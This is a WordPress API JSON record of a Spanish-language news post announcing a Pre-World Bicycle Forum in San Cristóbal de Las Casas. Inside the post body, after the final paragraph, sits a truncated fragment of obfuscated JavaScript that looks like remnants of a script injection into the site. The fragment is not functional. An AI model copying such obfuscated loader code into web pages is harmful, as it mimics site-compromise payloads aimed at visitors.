{"id":9871,"date":"2023-05-03T03:50:59","date_gmt":"2023-05-03T03:50:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9871"},"modified":"2023-05-03T03:50:59","modified_gmt":"2023-05-03T03:50:59","slug":"anuncian-pre-foro-mundial-de-la-bicicleta","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9871","title":{"rendered":"Anuncian Pre-Foro Mundial de la Bicicleta"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"770\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-02-at-3.16.49-PM-1024x770.jpeg\" alt=\"\" class=\"wp-image-9872\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-02-at-3.16.49-PM-1024x770.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-02-at-3.16.49-PM-300x226.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-02-at-3.16.49-PM-768x578.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-02-at-3.16.49-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>01 de Abril del 2023. San Crist\u00f3bal de Las Casas.- Representantes de diferentes clubes y agrupaciones de ciclistas invitaron a la poblaci\u00f3n en general al Pre Foro Mundial de la Bicicleta, d\u00f3nde est\u00e1 ciudad ser\u00e1 una de las sedes con actividades gratuitas que se realizar\u00e1n del cuatro al siete de mayo en diferentes lugares.<\/p>\n\n\n\n<p>En entrevista, comentaron que el objetivo del Pre Foro Mundial de la Bicicleta es fomentar el derecho de movilidad en condiciones de seguridad, accesibilidad, equidad, inclusi\u00f3n y sostenibilidad.<\/p>\n\n\n\n<p>&#8220;El foro se realizar\u00e1 en diversos escenarios, como el Centro Cultural de El Carmen, Centro Cultural Carlos Jurado y la plazuela de Guadalupe. Esta actividad est\u00e1 encaminada a participar en el pr\u00f3ximo Foro Mundial de la Bicicleta, que se realizar\u00e1 en Ciudad de M\u00e9xico del 1 al 5 de noviembre de este a\u00f1o&#8221;, informaron Vladimir Contreras Escamilla, Rogelio Ramos Torres y Juan Carlos Aguilar, integrantes de la comisi\u00f3n organizadora del evento.<\/p>\n\n\n\n<p>\u201cQueremos invitar cordialmente a la poblaci\u00f3n en general, a participar en el Pre-Foro Mundial de la Bicicleta con el fin de contribuir a la reconstrucci\u00f3n del tejido social y a fomentar el derecho de movilidad en condiciones de seguridad, accesibilidad, equidad, inclusi\u00f3n y sostenibilidad\u201d, reiteraron.<\/p>\n\n\n\n<p>El programa incluye conferencias, cine, rodadas, cursos de manejo de bicicleta, talleres para ni\u00f1os, exposiciones, trueque bicicletero y rifa de una bicicleta, entre otras.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 01 de Abril del 2023. San Crist\u00f3bal de Las Casas.- Representantes de diferentes clubes y agrupaciones de ciclistas invitaron a la poblaci\u00f3n en general al Pre Foro Mundial de la Bicicleta, d\u00f3nde est\u00e1 ciudad ser\u00e1 una de las sedes con actividades gratuitas que se realizar\u00e1n del cuatro al siete de mayo en diferentes &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9872,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9871","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9871","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9871"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9871\/revisions"}],"predecessor-version":[{"id":9873,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9871\/revisions\/9873"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9872"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9871"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9871"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9871"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}